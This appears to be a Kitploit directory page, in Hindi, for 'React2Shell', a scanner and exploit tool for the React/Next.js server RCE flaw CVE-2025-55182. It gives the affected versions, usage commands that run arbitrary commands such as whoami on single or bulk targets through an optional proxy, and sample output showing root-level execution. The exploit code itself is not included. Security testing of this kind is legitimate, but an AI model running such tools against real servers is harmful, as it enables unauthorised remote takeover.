Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
React2Shell — CVE-2025-55182-advanced-scanner | Kitploit
उपकरण/GitHubGitHub/ankitspandey07/react2shell
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूल
GitHubankitspandey07/react2shell

React2Shell

CVE-2025-55182-advanced-scanner

रिपॉजिटरी देखें
139 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

@#React2Hell — CVE-2025-55182 शोषण

🔥 Next.js / React सर्वर रिमोट कोड निष्पादन (RCE) शोषण

█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Next.js/React सर्वर RCE शोषण — CVE-2025-55182
 लेखक: Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — सुरक्षा परीक्षण उपयोगिता  🚀

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 अवलोकन

React2Hell एक शक्तिशाली शोषण उपकरण है जो CVE-2025-55182 का परीक्षण और शोषण करने के लिए डिज़ाइन किया गया है, जो Next.js और React सर्वर एक्शन को प्रभावित करने वाली एक गंभीर रिमोट कोड निष्पादन भेद्यता है।

React सर्वर घटकों के संस्करण 19.0.0, 19.1.0, 19.1.1, और 19.2.0 में एक प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन भेद्यता मौजूद है, जिसमें निम्नलिखित पैकेज शामिल हैं: react-server-dom-parcel, react-server-dom-turbopack, और react-server-dom-webpack। कमजोर कोड HTTP अनुरोधों से सर्वर फ़ंक्शन एंडपॉइंट पर पेलोड को असुरक्षित रूप से डिसिरियलाइज़ करता है।


✨ विशेषताएँ

  • 🧨 रिमोट कोड निष्पादन (RCE)
  • 🌐 एकल URL / बल्क URL स्कैनिंग
  • 🧩 कस्टम कमांड निष्पादन
  • 🕵️‍♂️ प्रॉक्सी समर्थन के साथ स्टील्थ मोड
  • ⚡ तेज़, विश्वसनीय और उपयोग में आसान

📌 उपयोग

एकल लक्ष्य मोड

python Scanner.py -u https://target.com -c "whoami"

एकाधिक लक्ष्य (फ़ाइल से)

python Scanner.py -l urls.txt -c "whoami"

HTTP प्रॉक्सी के साथ (Burp Suite)

python Scanner.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080

HTTPS प्रॉक्सी के साथ

python Scanner.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080

📁 urls.txt उदाहरण

http://site1.com
https://site2.com
http://192.168.1.10:3000

🖥️ नमूना आउटपुट

PS D:\Ankitspandey07\React2Hell> python.exe .\Scanner.py -l .\list.txt -c whoami


█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
 Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — Security Testing Utility  🚀

════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════

[→] Target: http://evil.com:3113/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────

[→] Target: http://example.lab:2000/
[→] Exec:   whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────

[→] Target: https://tale.lab:3000/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\Ankitspandey07\React2Hell>

⚠️ अस्वीकरण

यह उपकरण विशेष रूप से शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए बनाया गया है। स्पष्ट प्राधिकरण के बिना इसका उपयोग सिस्टम पर न करें। आप अपने कार्यों के लिए स्वयं जिम्मेदार हैं।


⭐ परियोजना का समर्थन करें

यदि इस शोषण ने आपकी मदद की, तो GitHub पर ⭐ छोड़ने पर विचार करें ❤️


👤 लेखक

Ankit Pandey; GitHub: https://github.com/Ankitspandey07

गर्व और जुनूनी पेंटेस्टर द्वारा 🔥 के साथ बनाया गया, जो हर कदम पर सीखने में सफल होता है।

टूल डाउनलोड करें